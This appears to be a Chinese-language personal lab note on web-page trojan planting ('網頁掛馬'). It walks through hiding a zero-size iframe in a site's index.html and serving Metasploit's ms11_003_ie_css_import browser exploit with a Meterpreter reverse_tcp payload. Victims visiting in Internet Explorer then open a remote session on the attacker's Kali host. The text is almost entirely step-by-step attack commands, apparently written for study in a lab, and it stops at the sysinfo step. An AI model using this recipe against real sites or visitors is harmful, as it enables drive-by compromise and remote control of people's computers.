瀏覽器安全之網頁掛馬實戰(筆記)
阿新 • • 發佈:2021-07-08
瀏覽器安全之網頁掛馬實戰(筆記)————用於自己記錄學習用
實驗環境
受害機:Windows7
攻擊機:Kali Linux IP:190.168.221.133
實驗步驟
步驟一
1.開啟/var/www/html,使用命令ls找到index.html,用vim開啟檔案
2.把程式碼插進index.html中:
<iframe src=地址 width=0 height=0></iframe>
步驟二
1.在Kali中啟動msfconsole
2.執行命令use exploit/windows/browser/ms11_003_ie_css_import
3.執行命令show options
4.執行命令:set SRVPORT 8060
5.執行命令:set URIPATH test.html
6.執行命令 set payload windows/meterpreter/reverse_tcp
7.執行命令show options
8.命令 set lhost 192.168.221.133
9.執行命令run,開始攻擊
步驟三
1.在Kali上開啟apache服務,service apache2 start
2.Windows機:開啟IE瀏覽器,訪問http://192.168.221.133/index.html
3.在Kali中可以看到受害機成功上線,成功獲取到會話記錄
5.Windows機關閉IE瀏覽器,Kali中 Ctrl+C 退出連線狀態
6.執行命令sessions
7.執行命令 sessions -i 1
8.輸入sysinfo命令,檢視靶機的相關資訊: